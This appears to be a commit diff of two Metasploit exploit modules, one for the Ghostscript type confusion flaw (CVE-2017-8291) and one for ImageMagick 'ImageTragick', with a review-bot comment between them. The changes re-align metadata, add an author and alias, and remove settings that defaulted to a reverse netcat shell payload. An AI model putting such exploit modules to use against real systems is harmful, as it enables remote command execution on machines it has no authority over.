parent
d25aad571f
commit
13ff71b879
|
@ -10,18 +10,18 @@ class MetasploitModule < Msf::Exploit
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Ghostscript Type Confusion Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
'Name' => 'Ghostscript Type Confusion Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a type confusion vulnerability in Ghostscript that can
|
||||
be exploited to obtain arbitrary command execution. This vulnerability affects
|
||||
Ghostscript version 9.21 and earlier and can be exploited through libraries
|
||||
such as ImageMagick and Pillow.
|
||||
},
|
||||
'Author' => [
|
||||
'Author' => [
|
||||
'Atlassian Security Team', # Vulnerability discovery
|
||||
'hdm' # Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
'References' => [
|
||||
%w{AKA ghostbutt},
|
||||
%w{CVE 2017-8291},
|
||||
%w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808},
|
||||
|
@ -29,28 +29,18 @@ class MetasploitModule < Msf::Exploit
|
|||
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d},
|
||||
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3}
|
||||
],
|
||||
'DisclosureDate' => 'Apr 27 2017',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => false,
|
||||
'Payload' => {
|
||||
'BadChars' => "\x22\x27\x5c)(", # ", ', \, (, and )
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd cmd_bash',
|
||||
'RequiredCmd' => 'generic netcat bash-tcp'
|
||||
}
|
||||
'DisclosureDate' => 'Apr 27 2017',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => false,
|
||||
'Payload' => {
|
||||
'BadChars' => "\x22\x27\x5c)(" # ", ', \, (, and )
|
||||
},
|
||||
'Targets' => [
|
||||
'Targets' => [
|
||||
['EPS file', template: 'msf.eps']
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'cmd/unix/reverse_netcat',
|
||||
'LHOST' => Rex::Socket.source_address,
|
||||
'DisablePayloadHandler' => false,
|
||||
'WfsDelay' => 9001
|
||||
}
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options([
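Review bot: The `'Payload'` hash on the new side keeps only `'BadChars'`, and the `'Compat'` and `'DefaultOptions'` entries are dropped with no comment recording why, so a maintainer reading the info hash cannot tell whether the omission is deliberate. A one-line comment above `'Payload'`, for example `# No Compat/DefaultOptions: payload and handler settings are left to framework defaults`, would document the intent; that wording assumes the removal was meant to defer to defaults, which the page does not state. The same section also shows `'Name'`, `'Description'`, `'Author'`, `'References'` and `'DisclosureDate'` through `'Privileged'` twice with identical text, which looks like whitespace-only re-alignment; mixing that with the functional removal makes the behaviour change harder to spot in review. The `initialize` body continues past `register_options([`, outside the visible hunk.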
|
||||
|
|
|
@ -30,6 +30,7 @@ class MetasploitModule < Msf::Exploit
|
|||
'Author' => [
|
||||
'stewie', # Vulnerability discovery
|
||||
'Nikolay Ermishkin', # Vulnerability discovery
|
||||
'Tavis Ormandy', # Vulnerability discovery
|
||||
'wvu', # Metasploit module
|
||||
'hdm' # Metasploit module
|
||||
],
|
||||
|
@ -41,7 +42,8 @@ class MetasploitModule < Msf::Exploit
|
|||
%w{URL http://seclists.org/oss-sec/2016/q3/682},
|
||||
%w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
|
||||
%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},
|
||||
%w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}
|
||||
%w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669},
|
||||
%w{AKA ImageTragick}
|
||||
],
|
||||
'DisclosureDate' => 'May 3 2016',
|
||||
'License' => MSF_LICENSE,
|
||||
|
|